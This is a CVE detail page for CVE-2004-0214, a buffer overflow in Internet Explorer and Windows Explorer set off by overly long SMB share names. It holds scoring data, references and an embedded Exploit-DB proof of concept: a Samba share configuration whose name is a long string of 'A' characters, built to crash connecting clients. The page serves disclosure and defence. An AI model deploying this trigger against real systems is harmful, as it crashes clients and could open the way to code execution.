CVE-2004-0214 : Detail

CVE-2004-0214

74.75%V4
Network
2004-10-16
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 24051

Publication date : 2004-04-24 22h00 +00:00
Author : Rodrigo Gutierrez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/10213/info Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition. This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user. [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] comment = Area 51 path = /tmp/testfolder public = yes writable = yes printable = no browseable = yes write list = @trymywingchung

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0.2900

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_98 >> Version *

Microsoft>>Windows_me >> Version *

Microsoft>>Windows_xp >> Version *

References

http://securitytracker.com/id?1011647
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/10213
Tags : vdb-entry, x_refsource_BID
http://www.osvdb.org/5687
Tags : vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/616200
Tags : third-party-advisory, x_refsource_CERT-VN
http://seclists.org/lists/fulldisclosure/2004/Apr/0933.html
Tags : mailing-list, x_refsource_FULLDISC
http://secunia.com/advisories/11482/
Tags : third-party-advisory, x_refsource_SECUNIA
http://seclists.org/lists/bugtraq/2004/Apr/0322.html
Tags : mailing-list, x_refsource_BUGTRAQ